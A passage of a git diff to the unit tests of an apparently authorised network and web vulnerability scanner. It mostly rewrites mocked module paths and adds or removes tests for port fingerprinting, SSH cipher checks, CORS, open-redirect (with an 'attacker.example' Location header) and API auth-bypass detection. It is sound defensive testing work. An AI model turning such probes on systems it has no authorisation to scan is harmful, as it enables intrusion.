"extensions.business.cybersec.red_mesh.worker.service.tls.ssl.create_default_context", return_value=DummyContextVerified(), ): info = worker._service_info_tls("example.com", 443) @@ -475,13 +484,13 @@ def wrap_socket(self, sock, server_hostname=None): import ssl with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.create_connection", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.create_connection", return_value=DummyConn(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.SSLContext", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.SSLContext", return_value=DummyContextUnverified(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.create_default_context", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.create_default_context", return_value=DummyContextVerified(), ): info = worker._service_info_tls("example.com", 443) @@ -505,7 +514,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", + "extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", return_value=DummySocket(), ): worker._scan_ports_step() @@ -533,7 +542,7 @@ def close(self): self.closed = True with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket(), ): info = worker._service_info_telnet("example.com", 23) @@ -562,7 +571,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_smb("example.com", 445) @@ -599,7 +608,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_vnc("example.com", 5900) @@ -635,7 +644,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_vnc("example.com", 5900) @@ -662,7 +671,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummyUDPSocket(), ): info = worker._service_info_snmp("example.com", 161) @@ -695,10 +704,10 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.random.randint", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.random.randint", return_value=tid, ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummyUDPSocket(), ): info = worker._service_info_dns("example.com", 53) @@ -727,7 +736,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_memcached("example.com", 11211) @@ -745,7 +754,7 @@ def test_service_elasticsearch_metadata(self): "tagline": "You Know, for Search", } with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.requests.get", return_value=resp, ): info = worker._service_info_elasticsearch("example.com", 9200) @@ -774,7 +783,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", return_value=DummySocket(), ): info = worker._service_info_modbus("example.com", 502) @@ -805,7 +814,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_postgresql("example.com", 5432) @@ -840,7 +849,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_postgresql("example.com", 5432) @@ -872,7 +881,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mssql("example.com", 1433) @@ -901,7 +910,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mongodb("example.com", 27017) @@ -913,7 +922,7 @@ def test_web_graphql_introspection(self): resp.status_code = 200 resp.text = "{\"data\":{\"__schema\":{}}}" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.post", return_value=resp, ): result = worker._web_test_graphql_introspection("example.com", 80) @@ -928,7 +937,7 @@ def fake_get(url, timeout=3, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -939,7 +948,7 @@ def test_web_api_auth_bypass(self): resp = MagicMock() resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_api_auth_bypass("example.com", 80) @@ -954,7 +963,7 @@ def test_cors_misconfiguration_detection(self): } resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_cors_misconfiguration("example.com", 80) @@ -966,7 +975,7 @@ def test_open_redirect_detection(self): resp.status_code = 302 resp.headers = {"Location": "https://attacker.example"} with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_open_redirect("example.com", 80) @@ -978,7 +987,7 @@ def test_http_methods_detection(self): resp.headers = {"Allow": "GET, POST, PUT"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.options", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.options", return_value=resp, ): result = worker._web_test_http_methods("example.com", 80) @@ -1085,7 +1094,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -1118,7 +1127,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -1151,7 +1160,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mysql("example.com", 3306) @@ -1169,7 +1178,7 @@ def test_tech_fingerprint(self): resp.text = '' resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_tech_fingerprint("example.com", 80) @@ -1208,7 +1217,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = modbus_response return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertEqual(worker.state["port_protocols"][1024], "modbus") @@ -1227,7 +1236,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = b"" return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertEqual(worker.state["port_protocols"][1024], "unknown") @@ -1247,7 +1256,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_binary return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][37364], "mysql") @@ -1269,7 +1278,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = mysql_greeting return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][3306], "mysql") @@ -1288,7 +1297,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = telnet_banner return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][2323], "telnet") @@ -1307,7 +1316,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_binary return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][8502], "telnet") @@ -1325,7 +1334,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = login_banner return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertEqual(worker.state["port_protocols"][2323], "telnet") @@ -1353,7 +1362,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = bad_modbus return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._active_fingerprint_ports() self.assertNotEqual(worker.state["port_protocols"][1024], "modbus") @@ -1373,7 +1382,7 @@ def fake_socket_factory(*args, **kwargs): mock_sock.recv.return_value = fake_pkt return mock_sock - with patch("extensions.business.cybersec.red_mesh.pentest_worker.socket.socket", side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.pentest_worker.socket.socket", side_effect=fake_socket_factory): worker._scan_ports_step() self.assertNotEqual(worker.state["port_protocols"][9999], "mysql") @@ -1392,7 +1401,7 @@ def recv(self, n): return b"220 mail.example.com ESMTP Exim 4.94.1 ready\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1414,7 +1423,7 @@ def recv(self, n): return b"SSH-2.0-OpenSSH_7.4\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1436,7 +1445,7 @@ def recv(self, n): return b'\x00\x01\x00\x00\x00\x05\x01\x03' def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1455,7 +1464,7 @@ def recv(self, n): return b"Welcome to Custom Service\r\n" def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.socket", return_value=DummySocket(), ): result = worker._service_info_generic("example.com", 9999) @@ -1482,13 +1491,14 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_vpn_endpoints("example.com", 443) self._assert_has_finding(result, "FortiGate") + class TestFindingsModule(unittest.TestCase): """Standalone tests for findings.py module.""" @@ -1512,6 +1522,7 @@ def test_finding_hashable(self): self.assertEqual(len(s), 1) + class TestCveDatabase(unittest.TestCase): """Standalone tests for cve_db.py module.""" @@ -1538,6 +1549,7 @@ def test_apache_path_traversal(self): self.assertTrue(any("CVE-2021-41773" in t for t in cve_ids)) + class TestCorrelationEngine(unittest.TestCase): """Tests for the cross-service correlation engine.""" @@ -1692,7 +1704,7 @@ def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_mysql("example.com", 3306) @@ -1734,7 +1746,7 @@ def quit(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): info = worker._service_info_ftp("example.com", 21) @@ -1755,7 +1767,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -1837,7 +1849,7 @@ def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -1858,6 +1870,23 @@ def test_execute_job_correlation(self): self.assertTrue(worker.state["done"]) self.assertIn("correlation_completed", worker.state["completed_tests"]) + def test_execute_job_skips_disabled_correlation_probe(self): + """Disabled correlation is reflected as a skipped probe, not silently omitted.""" + _, worker = self._build_worker() + worker._PentestLocalWorker__enabled_features = [] + + with patch.object(worker, "_scan_ports_step"), \ + patch.object(worker, "_active_fingerprint_ports"), \ + patch.object(worker, "_gather_service_info"), \ + patch.object(worker, "_run_web_tests"), \ + patch.object(worker, "_post_scan_correlate") as mock_correlate: + worker.execute_job() + + mock_correlate.assert_not_called() + metrics = worker.metrics.build().to_dict() + self.assertEqual(metrics["probe_breakdown"]["_post_scan_correlate"], "skipped:disabled") + + class TestScannerEnhancements(unittest.TestCase): """Tests for the 5 partial scanner enhancements (Tier 1).""" @@ -1976,7 +2005,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -2015,7 +2044,7 @@ def close(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.database.socket.socket", return_value=DummySocket(), ): info = worker._service_info_redis("example.com", 6379) @@ -2048,7 +2077,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2080,7 +2109,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2112,7 +2141,7 @@ def get_remote_server_key(self): return DummyKey() def close(self): pass with patch( - "extensions.business.cybersec.red_mesh.service_mixin.paramiko.Transport", + "extensions.business.cybersec.red_mesh.worker.service.common.paramiko.Transport", return_value=DummyTransport(), ): findings, weak_labels = worker._ssh_check_ciphers("example.com", 22) @@ -2188,7 +2217,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2210,7 +2239,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2232,7 +2261,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -2261,10 +2290,10 @@ def close(self): pass # Case 1: requests fails, raw socket also gets empty reply with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ -2292,10 +2321,10 @@ def close(self): pass raw_resp = b"HTTP/1.1 200 OK\r\nServer: nginx/1.24.0\r\n\r\n" with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([raw_resp, b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ -2328,10 +2357,10 @@ def close(self): pass ) with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", side_effect=ReqConnError("RemoteDisconnected"), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.socket", + "extensions.business.cybersec.red_mesh.worker.service.common.socket.socket", return_value=DummySocket([raw_resp, b""]), ): result = worker._service_info_http("10.0.0.1", 81) @@ -2342,2335 +2371,6 @@ def close(self): pass self.assertEqual(result.get("title"), "Directory listing for /") -class TestPhase1ConfigCID(unittest.TestCase): - """Phase 1: Job Config CID — extract static config from CStore to R1FS.""" - - def test_config_cid_roundtrip(self): - """JobConfig.from_dict(config.to_dict()) preserves all fields.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - original = JobConfig( - target="example.com", - start_port=1, - end_port=1024, - exceptions=[22, 80], - distribution_strategy="SLICE", - port_order="SHUFFLE", - nr_local_workers=4, - enabled_features=["http_headers", "sql_injection"], - excluded_features=["brute_force"], - run_mode="SINGLEPASS", - scan_min_delay=0.1, - scan_max_delay=0.5, - ics_safe_mode=True, - redact_credentials=False, - scanner_identity="test-scanner", - scanner_user_agent="RedMesh/1.0", - task_name="Test Scan", - task_description="A test scan", - monitor_interval=300, - selected_peers=["peer1", "peer2"], - created_by_name="tester", - created_by_id="user-123", - authorized=True, - ) - d = original.to_dict() - restored = JobConfig.from_dict(d) - self.assertEqual(original, restored) - - def test_config_to_dict_has_required_fields(self): - """to_dict() includes target, start_port, end_port, run_mode.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - config = JobConfig( - target="10.0.0.1", - start_port=1, - end_port=65535, - exceptions=[], - distribution_strategy="SLICE", - port_order="SEQUENTIAL", - nr_local_workers=2, - enabled_features=[], - excluded_features=[], - run_mode="CONTINUOUS_MONITORING", - ) - d = config.to_dict() - self.assertEqual(d["target"], "10.0.0.1") - self.assertEqual(d["start_port"], 1) - self.assertEqual(d["end_port"], 65535) - self.assertEqual(d["run_mode"], "CONTINUOUS_MONITORING") - - def test_config_strip_none(self): - """_strip_none removes None values from serialized config.""" - from extensions.business.cybersec.red_mesh.models import JobConfig - - config = JobConfig( - target="example.com", - start_port=1, - end_port=100, - exceptions=[], - distribution_strategy="SLICE", - port_order="SEQUENTIAL", - nr_local_workers=2, - enabled_features=[], - excluded_features=[], - run_mode="SINGLEPASS", - selected_peers=None, - ) - d = config.to_dict() - self.assertNotIn("selected_peers", d) - - @classmethod - def _mock_plugin_modules(cls): - """Install mock modules so pentester_api_01 can be imported without naeural_core.""" - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return # Already imported successfully - - # Build a real class to avoid metaclass conflicts - def endpoint_decorator(*args, **kwargs): - if args and callable(args[0]): - return args[0] - def wrapper(fn): - return fn - return wrapper - - class FakeBasePlugin: - CONFIG = {'VALIDATION_RULES': {}} - endpoint = staticmethod(endpoint_decorator) - - mock_module = MagicMock() - mock_module.FastApiWebAppPlugin = FakeBasePlugin - - modules_to_mock = { - 'naeural_core': MagicMock(), - 'naeural_core.business': MagicMock(), - 'naeural_core.business.default': MagicMock(), - 'naeural_core.business.default.web_app': MagicMock(), - 'naeural_core.business.default.web_app.fast_api_web_app': mock_module, - } - for mod_name, mod in modules_to_mock.items(): - sys.modules.setdefault(mod_name, mod) - - @classmethod - def _build_mock_plugin(cls, job_id="test-job", time_val=1000000.0, r1fs_cid="QmFakeConfigCID"): - """Build a mock plugin instance for launch_test testing.""" - plugin = MagicMock() - plugin.ee_addr = "node-1" - plugin.ee_id = "node-alias-1" - plugin.cfg_instance_id = "test-instance" - plugin.cfg_port_order = "SEQUENTIAL" - plugin.cfg_excluded_features = [] - plugin.cfg_distribution_strategy = "SLICE" - plugin.cfg_run_mode = "SINGLEPASS" - plugin.cfg_monitor_interval = 60 - plugin.cfg_scanner_identity = "" - plugin.cfg_scanner_user_agent = "" - plugin.cfg_nr_local_workers = 2 - plugin.cfg_llm_agent_api_enabled = False - plugin.cfg_ics_safe_mode = False - plugin.cfg_scan_min_rnd_delay = 0 - plugin.cfg_scan_max_rnd_delay = 0 - plugin.uuid.return_value = job_id - plugin.time.return_value = time_val - plugin.json_dumps.return_value = "{}" - plugin.r1fs = MagicMock() - plugin.r1fs.add_json.return_value = r1fs_cid - plugin.chainstore_hset = MagicMock() - plugin.chainstore_hgetall.return_value = {} - plugin.chainstore_peers = ["node-1"] - plugin.cfg_chainstore_peers = ["node-1"] - return plugin - - @classmethod - def _extract_job_specs(cls, plugin, job_id): - """Extract the job_specs dict from chainstore_hset calls.""" - for call in plugin.chainstore_hset.call_args_list: - kwargs = call[1] if call[1] else {} - if kwargs.get("key") == job_id: - return kwargs["value"] - return None - - def _launch(self, plugin, **kwargs): - """Call launch_test with mocked base modules.""" - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - defaults = dict(target="example.com", start_port=1, end_port=1024, exceptions="", authorized=True) - defaults.update(kwargs) - return PentesterApi01Plugin.launch_test(plugin, **defaults) - - def test_launch_builds_job_config_and_stores_cid(self): - """launch_test() builds JobConfig, saves to R1FS, stores job_config_cid in CStore.""" - plugin = self._build_mock_plugin(job_id="test-job-1", r1fs_cid="QmFakeConfigCID123") - self._launch(plugin) - - # Verify r1fs.add_json was called with a JobConfig dict - self.assertTrue(plugin.r1fs.add_json.called) - config_dict = plugin.r1fs.add_json.call_args_list[0][0][0] - self.assertEqual(config_dict["target"], "example.com") - self.assertEqual(config_dict["start_port"], 1) - self.assertEqual(config_dict["end_port"], 1024) - self.assertIn("run_mode", config_dict) - - # Verify CStore has job_config_cid - job_specs = self._extract_job_specs(plugin, "test-job-1") - self.assertIsNotNone(job_specs, "Expected chainstore_hset call for job_specs") - self.assertEqual(job_specs["job_config_cid"], "QmFakeConfigCID123") - - def test_cstore_has_no_static_config(self): - """After launch, CStore object has no exceptions, distribution_strategy, etc.""" - plugin = self._build_mock_plugin(job_id="test-job-2") - self._launch(plugin) - - job_specs = self._extract_job_specs(plugin, "test-job-2") - self.assertIsNotNone(job_specs) - - # These static config fields must NOT be in CStore - removed_fields = [ - "exceptions", "distribution_strategy", "enabled_features", - "excluded_features", "scan_min_delay", "scan_max_delay", - "ics_safe_mode", "redact_credentials", "scanner_identity", - "scanner_user_agent", "nr_local_workers", "task_description", - "monitor_interval", "selected_peers", "created_by_name", - "created_by_id", "authorized", "port_order", - ] - for field in removed_fields: - self.assertNotIn(field, job_specs, f"CStore should not contain '{field}'") - - def test_cstore_has_listing_fields(self): - """CStore has target, task_name, start_port, end_port, date_created.""" - plugin = self._build_mock_plugin(job_id="test-job-3", time_val=1700000000.0) - self._launch(plugin, start_port=80, end_port=443, task_name="Web Scan") - - job_specs = self._extract_job_specs(plugin, "test-job-3") - self.assertIsNotNone(job_specs) - - self.assertEqual(job_specs["target"], "example.com") - self.assertEqual(job_specs["task_name"], "Web Scan") - self.assertEqual(job_specs["start_port"], 80) - self.assertEqual(job_specs["end_port"], 443) - self.assertEqual(job_specs["date_created"], 1700000000.0) - self.assertEqual(job_specs["risk_score"], 0) - - def test_pass_reports_initialized_empty(self): - """CStore has pass_reports: [] (no pass_history).""" - plugin = self._build_mock_plugin(job_id="test-job-4") - self._launch(plugin, start_port=1, end_port=100) - - job_specs = self._extract_job_specs(plugin, "test-job-4") - self.assertIsNotNone(job_specs) - - self.assertIn("pass_reports", job_specs) - self.assertEqual(job_specs["pass_reports"], []) - self.assertNotIn("pass_history", job_specs) - - def test_launch_fails_if_r1fs_unavailable(self): - """If R1FS fails to store config, launch aborts with error.""" - plugin = self._build_mock_plugin(job_id="test-job-5", r1fs_cid=None) - result = self._launch(plugin, start_port=1, end_port=100) - - self.assertIn("error", result) - # CStore should NOT have been written with the job - job_specs = self._extract_job_specs(plugin, "test-job-5") - self.assertIsNone(job_specs) - - -class TestPhase2PassFinalization(unittest.TestCase): - """Phase 2: Single Aggregation + Consolidated Pass Reports.""" - - @classmethod - def _mock_plugin_modules(cls): - """Install mock modules so pentester_api_01 can be imported without naeural_core.""" - if 'extensions.business.cybersec.red_mesh.pentester_api_01' in sys.modules: - return - TestPhase1ConfigCID._mock_plugin_modules() - - def _get_plugin_class(self): - self._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - return PentesterApi01Plugin - - def _build_finalize_plugin(self, job_id="test-job", job_pass=1, run_mode="SINGLEPASS", - llm_enabled=False, r1fs_returns=None): - """Build a mock plugin pre-configured for _maybe_finalize_pass testing.""" - plugin = MagicMock() - plugin.ee_addr = "launcher-node" - plugin.ee_id = "launcher-alias" - plugin.cfg_instance_id = "test-instance" - plugin.cfg_llm_agent_api_enabled = llm_enabled - plugin.cfg_llm_agent_api_host = "localhost" - plugin.cfg_llm_agent_api_port = 8080 - plugin.cfg_llm_agent_api_timeout = 30 - plugin.cfg_llm_auto_analysis_type = "security_assessment" - plugin.cfg_monitor_interval = 60 - plugin.cfg_monitor_jitter = 0 - plugin.cfg_attestation_min_seconds_between_submits = 300 - plugin.time.return_value = 1000100.0 - plugin.json_dumps.return_value = "{}" - - # R1FS mock - plugin.r1fs = MagicMock() - cid_counter = {"n": 0} - def fake_add_json(data, show_logs=True): - cid_counter["n"] += 1 - if r1fs_returns is not None: - return r1fs_returns.get(cid_counter["n"], f"QmCID{cid_counter['n']}") - return f"QmCID{cid_counter['n']}" - plugin.r1fs.add_json.side_effect = fake_add_json - - # Job config in R1FS - plugin.r1fs.get_json.return_value = { - "target": "example.com", "start_port": 1, "end_port": 1024, - "run_mode": run_mode, "enabled_features": [], "monitor_interval": 60, - } - - # Build job_specs with two finished workers - job_specs = { - "job_id": job_id, - "job_status": "RUNNING", - "job_pass": job_pass, - "run_mode": run_mode, - "launcher": "launcher-node", - "launcher_alias": "launcher-alias", - "target": "example.com", - "task_name": "Test", - "start_port": 1, - "end_port": 1024, - "date_created": 1000000.0, - "risk_score": 0, - "job_config_cid": "QmConfigCID", - "workers": { - "worker-A": {"start_port": 1, "end_port": 512, "finished": True, "report_cid": "QmReportA"}, - "worker-B": {"start_port": 513, "end_port": 1024, "finished": True, "report_cid": "QmReportB"}, - }, - "timeline": [{"type": "created", "label": "Created", "date": 1000000.0, "actor": "launcher-alias", "actor_type": "system", "meta": {}}], - "pass_reports": [], - } - - plugin.chainstore_hgetall.return_value = {job_id: job_specs} - plugin.chainstore_hset = MagicMock() - - return plugin, job_specs - - def _sample_node_report(self, start_port=1, end_port=512, open_ports=None, findings=None): - """Build a sample node report dict.""" - report = { - "start_port": start_port, - "end_port": end_port, - "open_ports": open_ports or [80, 443], - "ports_scanned": end_port - start_port + 1, - "nr_open_ports": len(open_ports or [80, 443]), - "service_info": {}, - "web_tests_info": {}, - "completed_tests": ["port_scan"], - "port_protocols": {"80": "http", "443": "https"}, - "port_banners": {}, - "correlation_findings": [], - } - if findings: - # Add findings under service_info for port 80 - report["service_info"] = { - "80": { - "_service_info_http": { - "findings": findings, - } - } - } - return report - - def test_single_aggregation(self): - """_collect_node_reports called exactly once per pass finalization.""" - PentesterApi01Plugin = self._get_plugin_class() - plugin, job_specs = self._build_finalize_plugin() - - # Mock _collect_node_reports and _get_aggregated_report - report_a = self._sample_node_report(1, 512, [80]) - report_b = self._sample_node_report(513, 1024, [443]) - plugin._collect_node_reports = 